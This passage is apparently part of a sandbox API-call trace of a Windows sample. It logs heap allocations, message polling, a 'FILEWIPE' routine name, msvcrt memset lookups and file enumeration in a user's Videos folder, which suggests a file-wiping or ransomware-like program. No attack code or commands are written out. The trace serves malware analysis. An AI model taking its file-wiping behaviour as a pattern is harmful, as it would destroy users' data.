CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.433] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.433] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0197.433] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0197.433] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.434] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0197.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.434] CloseHandle (hObject=0x158) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0197.435] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.436] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0197.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0197.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.436] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.437] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0197.438] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0197.438] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.438] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.438] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0x90ae18 [0197.439] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.439] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0197.439] CharLowerBuffW (in: lpsz="byte[30328]", cchLength=0xb | out: lpsz="byte[30328]") returned 0xb [0197.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.440] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.440] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.440] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0197.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.440] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1a30 [0197.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1a30, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.441] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.441] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.442] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.442] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0197.442] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0197.442] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.443] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, 